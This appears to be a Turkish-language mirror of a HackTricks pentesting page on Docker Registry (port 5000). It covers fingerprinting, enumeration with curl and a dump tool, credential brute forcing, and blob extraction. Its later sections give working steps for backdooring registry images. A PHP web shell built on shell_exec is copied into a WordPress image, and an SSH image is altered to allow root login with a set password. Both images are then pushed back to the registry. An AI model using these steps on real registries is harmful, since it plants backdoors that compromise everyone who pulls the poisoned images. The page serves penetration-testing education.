mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
280 lines
14 KiB
Markdown
280 lines
14 KiB
Markdown
# 5000 - Docker Registry Pentesting
|
||
|
||
<details>
|
||
|
||
<summary><strong>AWS hacklemeyi sıfırdan kahramanla öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
|
||
|
||
HackTricks'ı desteklemenin diğer yolları:
|
||
|
||
* **Şirketinizi HackTricks'te reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
|
||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'u takip edin**.
|
||
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
|
||
|
||
</details>
|
||
|
||
## Temel Bilgiler
|
||
|
||
Adlandırılan ve birden çok sürümle gelebilen Docker görüntüleri için bir depolama ve dağıtım sistemi olan bir **Docker registry** mevcuttur. Bu görüntüler, her biri belirli bir görüntünün çeşitli sürümlerini depolayan **Docker depoları** içinde düzenlenir. Sağlanan işlevsellik, kullanıcının gerekli izinlere sahip olması durumunda görüntülerin yerel olarak indirilmesine veya kaydedilmesine olanak tanır.
|
||
|
||
**DockerHub**, Docker için varsayılan genel registry olarak hizmet verir, ancak kullanıcılar ayrıca açık kaynaklı Docker registry/distribution'ın yerinde bir sürümünü çalıştırma veya ticari olarak desteklenen **Docker Trusted Registry** seçeneğini tercih edebilirler. Ayrıca, çeşitli diğer genel registry'ler çevrimiçi olarak bulunabilir.
|
||
|
||
Yerinde bir registry'den bir görüntü indirmek için aşağıdaki komut kullanılır:
|
||
```bash
|
||
docker pull my-registry:9000/foo/bar:2.1
|
||
```
|
||
Bu komut, `my-registry` alan adındaki yerinde kayıt defterinden `foo/bar` görüntüsünün `2.1` sürümünü alır. Aynı görüntüyü DockerHub'dan indirmek için, özellikle `2.1` en son sürüm ise, komut şu şekilde basitleştirilir:
|
||
```bash
|
||
docker pull foo/bar
|
||
```
|
||
**Varsayılan port:** 5000
|
||
```
|
||
PORT STATE SERVICE VERSION
|
||
5000/tcp open http Docker Registry (API: 2.0)
|
||
```
|
||
## Keşif
|
||
|
||
Bu hizmetin çalıştığını keşfetmenin en kolay yolu, nmap çıktısında bulmaktır. Neyse ki, HTTP tabanlı bir hizmet olduğu için HTTP proxy'lerin arkasında olabilir ve nmap bunu tespit etmeyebilir.\
|
||
Bazı parmak izleri:
|
||
|
||
* `/`'ye erişirseniz, yanıtta hiçbir şey dönmeyecektir
|
||
* `/v2/`'ye erişirseniz, `{}` döner
|
||
* `/v2/_catalog`'a erişirseniz, aşağıdakileri elde edebilirsiniz:
|
||
* `{"repositories":["alpine","ubuntu"]}`
|
||
* `{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}`
|
||
|
||
## Numaralandırma
|
||
|
||
### HTTP/HTTPS
|
||
|
||
Docker kayıt defteri **HTTP** veya **HTTPS** kullanacak şekilde yapılandırılmış olabilir. Bu yüzden yapmanız gereken ilk şey, **hangi birinin** yapılandırıldığını **bulmaktır**:
|
||
```bash
|
||
curl -s http://10.10.10.10:5000/v2/_catalog
|
||
#If HTTPS
|
||
Warning: Binary output can mess up your terminal. Use "--output -" to tell
|
||
Warning: curl to output it to your terminal anyway, or consider "--output
|
||
Warning: <FILE>" to save to a file.
|
||
|
||
#If HTTP
|
||
{"repositories":["alpine","ubuntu"]}
|
||
```
|
||
### Kimlik Doğrulama
|
||
|
||
Docker kayıt defteri ayrıca **kimlik doğrulama** gerektirecek şekilde yapılandırılabilir:
|
||
```bash
|
||
curl -k https://192.25.197.3:5000/v2/_catalog
|
||
#If Authentication required
|
||
{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}
|
||
#If no authentication required
|
||
{"repositories":["alpine","ubuntu"]}
|
||
```
|
||
Docker Registry kimlik doğrulaması gerektiriyorsa, bunu [**deneyerek brute force yapmayı deneyebilirsiniz**](../generic-methodologies-and-resources/brute-force.md#docker-registry).\
|
||
**Geçerli kimlik bilgilerini bulursanız**, kayıt defterini numaralandırmak için onları kullanmanız gerekecektir, `curl` ile bunları şu şekilde kullanabilirsiniz:
|
||
```bash
|
||
curl -k -u username:password https://10.10.10.10:5000/v2/_catalog
|
||
```
|
||
### DockerRegistryGrabber kullanarak Sıralama
|
||
|
||
[DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber), docker kaynaklarını (temel kimlik doğrulama olmadan veya temel kimlik doğrulama ile) sıralamak / dökümlemek için kullanılan bir Python aracıdır.
|
||
```bash
|
||
python3 DockerGraber.py http://127.0.0.1 --list
|
||
|
||
[+] my-ubuntu
|
||
[+] my-ubuntu2
|
||
|
||
python3 DockerGraber.py http://127.0.0.1 --dump_all
|
||
|
||
[+] my-ubuntu
|
||
[+] my-ubuntu2
|
||
[+] blobSum found 5
|
||
[+] Dumping my-ubuntu
|
||
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
|
||
[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
|
||
[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
|
||
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
|
||
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
|
||
[+] blobSum found 5
|
||
[+] Dumping my-ubuntu2
|
||
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
|
||
[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
|
||
[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
|
||
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
|
||
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
|
||
|
||
|
||
python3 DockerGraber.py http://127.0.0.1 --dump my-ubuntu
|
||
|
||
[+] blobSum found 5
|
||
[+] Dumping my-ubuntu
|
||
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
|
||
[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
|
||
[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
|
||
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
|
||
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
|
||
```
|
||
### curl kullanarak Numaralandırma
|
||
|
||
Docker kayıt defterine **erişim sağladıktan sonra**, onu numaralandırmak için kullanabileceğiniz bazı komutlar aşağıda verilmiştir:
|
||
```bash
|
||
#List repositories
|
||
curl -s http://10.10.10.10:5000/v2/_catalog
|
||
{"repositories":["alpine","ubuntu"]}
|
||
|
||
#Get tags of a repository
|
||
curl -s http://192.251.36.3:5000/v2/ubuntu/tags/list
|
||
{"name":"ubuntu","tags":["14.04","12.04","18.04","16.04"]}
|
||
|
||
#Get manifests
|
||
curl -s http://192.251.36.3:5000/v2/ubuntu/manifests/latest
|
||
{
|
||
"schemaVersion": 1,
|
||
"name": "ubuntu",
|
||
"tag": "latest",
|
||
"architecture": "amd64",
|
||
"fsLayers": [
|
||
{
|
||
"blobSum": "sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935"
|
||
},
|
||
{
|
||
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
|
||
},
|
||
{
|
||
"blobSum": "sha256:e7c96db7181be991f19a9fb6975cdbbd73c65f4a2681348e63a141a2192a5f10"
|
||
}
|
||
],
|
||
"history": [
|
||
{
|
||
"v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"container_config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:96c69e5db7e6d87db2a51d3894183e9e305a144c73659d5578d300bd2175b5d6 in /etc/network/if-post-up.d \"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"created\":\"2019-05-13T14:06:51.794876531Z\",\"docker_version\":\"18.09.4\",\"id\":\"911999e848d2c283cbda4cd57306966b44a05f3f184ae24b4c576e0f2dfb64d0\",\"os\":\"linux\",\"parent\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\"}"
|
||
},
|
||
{
|
||
"v1Compatibility": "{\"id\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\",\"parent\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.510395965Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}"
|
||
},
|
||
{
|
||
"v1Compatibility": "{\"id\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.358250803Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:a86aea1f3a7d68f6ae03397b99ea77f2e9ee901c5c59e59f76f93adbb4035913 in / \"]}}"
|
||
}
|
||
],
|
||
"signatures": [
|
||
{
|
||
"header": {
|
||
"jwk": {
|
||
"crv": "P-256",
|
||
"kid": "DJNH:N6JL:4VOW:OTHI:BSXU:TZG5:6VPC:D6BP:6BPR:ULO5:Z4N4:7WBX",
|
||
"kty": "EC",
|
||
"x": "leyzOyk4EbEWDY0ZVDoU8_iQvDcv4hrCA0kXLVSpCmg",
|
||
"y": "Aq5Qcnrd-6RO7VhUS2KPpftoyjjBWVoVUiaPluXq4Fg"
|
||
},
|
||
"alg": "ES256"
|
||
},
|
||
"signature": "GIUf4lXGzdFk3aF6f7IVpF551UUqGaSsvylDqdeklkUpw_wFhB_-FVfshodDzWlEM8KI-00aKky_FJez9iWL0Q",
|
||
"protected": "eyJmb3JtYXRMZW5ndGgiOjI1NjQsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMS0wMS0wMVQyMDoxMTowNFoifQ"
|
||
}
|
||
]
|
||
}
|
||
|
||
#Download one of the previously listed blobs
|
||
curl http://10.10.10.10:5000/v2/ubuntu/blobs/sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935 --output blob1.tar
|
||
|
||
#Inspect the insides of each blob
|
||
tar -xf blob1.tar #After this,inspect the new folders and files created in the current directory
|
||
```
|
||
{% hint style="warning" %}
|
||
Not: Blobs dosyalarını indirdiğinizde ve açtığınızda, mevcut dizinde dosya ve klasörler görünecektir. **Eğer tüm blobları indirip aynı klasöre açarsanız, önceden açılmış bloblardan gelen değerleri üzerine yazacaklardır**, bu yüzden dikkatli olun. Her bir blobu ayrı bir klasör içinde açarak her bir blobun tam içeriğini incelemek ilginç olabilir.
|
||
{% endhint %}
|
||
|
||
### Docker kullanarak Numaralandırma
|
||
```bash
|
||
#Once you know which images the server is saving (/v2/_catalog) you can pull them
|
||
docker pull 10.10.10.10:5000/ubuntu
|
||
|
||
#Check the commands used to create the layers of the image
|
||
docker history 10.10.10.10:5000/ubuntu
|
||
#IMAGE CREATED CREATED BY SIZE COMMENT
|
||
#ed05bef01522 2 years ago ./run.sh 46.8MB
|
||
#<missing> 2 years ago /bin/sh -c #(nop) CMD ["./run.sh"] 0B
|
||
#<missing> 2 years ago /bin/sh -c #(nop) EXPOSE 80 0B
|
||
#<missing> 2 years ago /bin/sh -c cp $base/mysql-setup.sh / 499B
|
||
#<missing> 2 years ago /bin/sh -c #(nop) COPY dir:0b657699b1833fd59… 16.2MB
|
||
|
||
#Run and get a shell
|
||
docker run -it 10.10.10.10:5000/ubuntu bash #Leave this shell running
|
||
docker ps #Using a different shell
|
||
docker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container
|
||
```
|
||
### WordPress görüntüsüne arka kapı ekleme
|
||
|
||
WordPress görüntüsünü kaydeden bir Docker Registry bulduğunuz senaryoda, ona arka kapı ekleyebilirsiniz.\
|
||
**Arka kapıyı oluşturun**:
|
||
|
||
{% code title="shell.php" %}
|
||
```bash
|
||
<?php echo shell_exec($_GET["cmd"]); ?>
|
||
```
|
||
{% code title="Dockerfile" %}
|
||
|
||
Bir **Dockerfile** oluşturun:
|
||
|
||
{% endcode %}
|
||
```bash
|
||
FROM 10.10.10.10:5000/wordpress
|
||
COPY shell.php /app/
|
||
RUN chmod 777 /app/shell.php
|
||
```
|
||
{% endcode %}
|
||
|
||
Yeni görüntüyü **oluşturun**, oluşturulduğunu **kontrol edin** ve **yayınlayın**:
|
||
```bash
|
||
docker build -t 10.10.10.10:5000/wordpress .
|
||
#Create
|
||
docker images
|
||
docker push registry:5000/wordpress #Push it
|
||
```
|
||
### SSH sunucusu görüntüsüne arka kapı ekleme
|
||
|
||
Diyelim ki bir SSH görüntüsüne sahip olan bir Docker Registry buldunuz ve ona arka kapı eklemek istiyorsunuz.\
|
||
Görüntüyü **indirin** ve **çalıştırın**:
|
||
```bash
|
||
docker pull 10.10.10.10:5000/sshd-docker-cli
|
||
docker run -d 10.10.10.10:5000/sshd-docker-cli
|
||
```
|
||
SSH görüntüsünden `sshd_config` dosyasını çıkarın:
|
||
```bash
|
||
docker cp 4c989242c714:/etc/ssh/sshd_config .
|
||
```
|
||
Ve onu ayarlamak için değiştirin: `PermitRootLogin yes`
|
||
|
||
Aşağıdaki gibi bir **Dockerfile** oluşturun:
|
||
|
||
{% tabs %}
|
||
{% tab title="Dockerfile" %}
|
||
```bash
|
||
FROM 10.10.10.10:5000/sshd-docker-cli
|
||
COPY sshd_config /etc/ssh/
|
||
RUN echo root:password | chpasswd
|
||
```
|
||
{% endtab %}
|
||
{% endtabs %}
|
||
|
||
Yeni görüntüyü **oluşturun**, oluşturulduğunu **kontrol edin** ve **yayınlayın**:
|
||
```bash
|
||
docker build -t 10.10.10.10:5000/sshd-docker-cli .
|
||
#Create
|
||
docker images
|
||
docker push registry:5000/sshd-docker-cli #Push it
|
||
```
|
||
## Referanslar
|
||
* [https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/](https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/)
|
||
|
||
<details>
|
||
|
||
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
|
||
|
||
HackTricks'i desteklemenin diğer yolları:
|
||
|
||
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** isterseniz, [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
|
||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
|
||
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
|
||
* Hacking hilelerinizi [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR göndererek paylaşın.
|
||
|
||
</details>
|